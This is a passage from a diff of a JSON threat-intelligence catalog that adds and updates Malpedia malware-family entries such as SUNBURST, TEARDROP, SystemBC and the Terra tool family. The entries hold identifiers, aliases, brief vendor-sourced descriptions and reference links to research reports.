"https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", + "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947", + "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs", + "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095", + "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection", + "https://twitter.com/KimZetter/status/1338305089597964290", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga", + "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", + "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection", + "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/", + "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", + "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf", + "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/", + "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/", + "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling", + "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", + "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html", + "https://www.youtube.com/watch?v=JoMwrkijTZ8", + "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar", + "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf", + "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/", + "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure", + "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/", + "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", + "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action", + "https://securelist.com/sunburst-backdoor-kazuar/99981/", + "https://pastebin.com/6EDgCKxd", + "https://www.youtube.com/watch?v=mbGN1xqy1jY", + "https://www.solarwinds.com/securityadvisory/faq", + "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack", + "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html", + "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack", + "https://twitter.com/FireEye/status/1339295983583244302", + "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha", + "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/", + "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/", + "https://youtu.be/Ta_vatZ24Cs?t=59", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.cadosecurity.com/post/responding-to-solarigate", + "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", + "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/", + "https://twitter.com/ItsReallyNick/status/1338382939835478016", + "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/", + "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", + "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q", + "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html", + "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718", + "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/", + "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/", + "https://netresec.com/?b=2113a6a", + "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response", + "https://www.fireeye.com/current-threats/sunburst-malware.html", + "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html", + "https://github.com/fireeye/sunburst_countermeasures", + "https://twitter.com/Intel471Inc/status/1339233255741120513", + "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control", + "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html", + "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/", + "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610", + "https://github.com/SentineLabs/SolarWinds_Countermeasures", + "https://www.mimecast.com/blog/important-security-update/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection", + "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html", + "https://twitter.com/lordx64/status/1338526166051934213", + "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc", + "https://github.com/fireeye/Mandiant-Azure-AD-Investigator", + "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/", + "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/", + "https://twitter.com/cybercdh/status/1338885244246765569", + "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/", + "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/", + "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware" + ], + "synonyms": [ + "Solorigate" + ], + "type": [] + }, + "uuid": "34e50688-6955-4c28-8e18-50252e5ea711", + "value": "SUNBURST" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83", + "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "018fb88b-a3cd-46b7-adea-a5b85302715b", + "value": "SunCrypt" + }, { "description": "", "meta": { @@ -16210,6 +29634,36 @@ "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", "value": "SunOrcal" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova", + "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html", + "https://github.com/fireeye/sunburst_countermeasures", + "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://www.anquanke.com/post/id/226029", + "https://www.solarwinds.com/securityadvisory/faq", + "https://www.solarwinds.com/securityadvisory", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a", + "https://unit42.paloaltonetworks.com/solarstorm-supernova/", + "https://github.com/fireeye/sunburst_countermeasures/pull/5", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://www.youtube.com/watch?v=7WX5fCEzTlA", + "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group", + "https://twitter.com/MalwareRE/status/1342888881373503488", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "62674a18-54c6-4c57-84cc-ea6a3bb2d6d6", + "value": "SUPERNOVA" + }, { "description": "", "meta": { @@ -16233,14 +29687,27 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr", + "https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/" ], "synonyms": [], "type": [] }, - "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", - "value": "Swift?" + "uuid": "8666afcc-8cc2-4856-83de-b7e8b4309367", + "value": "surtr" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen", + "https://en.wikipedia.org/wiki/Swen_(computer_worm)" + ], + "synonyms": [], + "type": [] + }, + "uuid": "63657a3b-1f8f-422d-80de-fe4644f5d7ba", + "value": "swen" }, { "description": "", @@ -16261,11 +29728,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", - "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://community.rsa.com/thread/185437", + "https://www.secureworks.com/research/threat-profiles/bronze-edison", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://www.symantec.com/connect/blogs/sykipot-attacks" ], "synonyms": [ + "Wkysol", "getkys" ], "type": [] @@ -16340,11 +29810,12 @@ "value": "Sys10" }, { - "description": "", + "description": "SYSCON is a Remote Access Trojan used in a targeted champing against US government agencies. It has been recently observed in conjunction with CARROTBAT and CARROTBALL downloaders and it uses the File Transfer Protocol as Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/" ], "synonyms": [], @@ -16366,11 +29837,31 @@ "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", "value": "SysGet" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit", + "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897", + "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html", + "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain", + "https://twitter.com/QW5kcmV3/status/1176861114535165952" + ], + "synonyms": [ + "IvizTech", + "MANGOPUNCH" + ], + "type": [] + }, + "uuid": "4922f27b-a97c-4d6b-9425-1705f4716ee0", + "value": "SysKit" + }, { "description": "Sysraw stealer got its name because at some point, it was started as \"ZSysRaw\\sysraw.exe\". PDB strings suggest the name \"Clipsa\" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named \"1?[-+].dat\" and POSTs them.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer", + "https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/", "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" ], "synonyms": [ @@ -16393,6 +29884,23 @@ "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", "value": "SysScan" }, + { + "description": "SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.\r\n\r\nSystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc", + "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://news.sophos.com/en-us/2020/12/16/systembc/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd0ad49d-7f79-45e0-91ba-c5eecdabe3aa", + "value": "SystemBC" + }, { "description": "", "meta": { @@ -16427,9 +29935,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html", - "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1" + "https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat", + "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf" ], "synonyms": [ "simbot" @@ -16439,6 +29952,20 @@ "uuid": "94323b32-9566-450b-8480-5f9f53b57948", "value": "taidoor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-133b", + "https://blog.reversinglabs.com/blog/hidden-cobra" + ], + "synonyms": [], + "type": [] + }, + "uuid": "014940fb-6e31-408a-962f-71914d0eb2f5", + "value": "TAINTEDSCRIBE" + }, { "description": "", "meta": { @@ -16469,8 +29996,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", - "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux" ], "synonyms": [], "type": [] @@ -16491,14 +30017,48 @@ "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", "value": "Tarsip" }, + { + "description": "According to Zscaler, Taurus is a stealer that surfaced in June 2020. It is being developed by the author(s) that previously created Predator the Thief. The name overlaps partly with the StealerOne / Terra* family (also aliased Taurus Loader) but appears to be a completely disjunct project.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer", + "https://www.zscaler.com/blogs/research/taurus-new-stealer-town", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "68b89458-f78e-41b3-b0ee-c193aaa948f9", + "value": "Taurus Stealer" + }, + { + "description": "Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient", + "https://twitter.com/stvemillertime/status/1266050369370677249" + ], + "synonyms": [ + "FIRESHADOW" + ], + "type": [] + }, + "uuid": "fc551237-8db7-4cfd-a915-9e8410abb313", + "value": "TClient" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf", + "https://securityintelligence.com/hammertoss-what-me-worry/", + "https://www.youtube.com/watch?v=UE9suwyuic8" + ], + "synonyms": [ + "HAMMERTOSS", + "HammerDuke" ], - "synonyms": [], "type": [] }, "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", @@ -16532,6 +30092,61 @@ "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", "value": "TeamBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging", + "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent" + ], + "synonyms": [ + "TVRAT", + "TVSPY", + "TeamViewerENT" + ], + "type": [] + }, + "uuid": "9a82b6f6-2fdf-47bc-af05-cf7ce225fc96", + "value": "TeamSpy" + }, + { + "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop", + "https://www.brighttalk.com/webcast/7451/462719", + "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", + "https://twitter.com/craiu/status/1339954817247158272", + "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", + "https://github.com/fireeye/sunburst_countermeasures", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", + "https://twitter.com/TheEnergyStory/status/1346096298311741440", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://twitter.com/TheEnergyStory/status/1342041055563313152", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware", + "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate" + ], + "synonyms": [], + "type": [] + }, + "uuid": "efa01fef-7faf-4bb2-8630-b3a237df882a", + "value": "TEARDROP" + }, { "description": "", "meta": { @@ -16545,11 +30160,38 @@ "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091", "value": "TefoSteal" }, + { + "description": "According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telandext", + "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b2b5a816-2268-4cb8-9958-491356c452ec", + "value": "TelAndExt" + }, + { + "description": "According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb", + "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "daf2f70b-205e-4b39-89a6-d382ded4c33c", + "value": "TelB" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", + "https://www.secureworks.com/research/threat-profiles/iron-viking", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], @@ -16563,6 +30205,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", + "https://www.secureworks.com/research/threat-profiles/iron-viking", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" ], @@ -16616,6 +30259,87 @@ "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d", "value": "Termite" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8036e023-c765-4bd6-828f-1c8d20987843", + "value": "TerraPreter" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ddfda5dc-a416-4cf3-b734-6aa083aa9e04", + "value": "TerraLoader" + }, + { + "description": "According to QuoINT TerraRecon is a reconnaissance tool, looking for a specific piece of hardware and software targeting retail and payment services sectors. Attributed to Golden Chickens.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "synonyms": [ + "Taurus Loader Reconnaissance Module" + ], + "type": [] + }, + "uuid": "d8efa615-87bf-4477-8261-316215c0b637", + "value": "TerraRecon" + }, + { + "description": "According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting for example email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", + "https://twitter.com/3xp0rtblog/status/1275746149719252992" + ], + "synonyms": [ + "SONE", + "StealerOne", + "Taurus Loader Stealer Module" + ], + "type": [] + }, + "uuid": "d5c9a697-c7bf-4e13-8c2e-c74465e77208", + "value": "TerraStealer" + }, + { + "description": "TerraTV is a custom DLL designed to hijack legit TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to Golden Chickens malware as a service group.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "synonyms": [ + "Taurus Loader TeamViewer Module" + ], + "type": [] + }, + "uuid": "0597af12-88d2-4289-a154-191774e3f48d", + "value": "TerraTV" + }, { "description": "", "meta": { @@ -16626,9 +30350,12 @@ "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", + "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/", "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", - "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", - "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" + "https://community.riskiq.com/article/30f22a00", + "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack", + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", + "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/" ], "synonyms": [ "cryptesla" @@ -16638,6 +30365,21 @@ "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", "value": "TeslaCrypt" }, + { + "description": "TFlower is a new ransomware targeting mostly corporate networks discovered in August, 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware will conduct a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware also will terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extention to 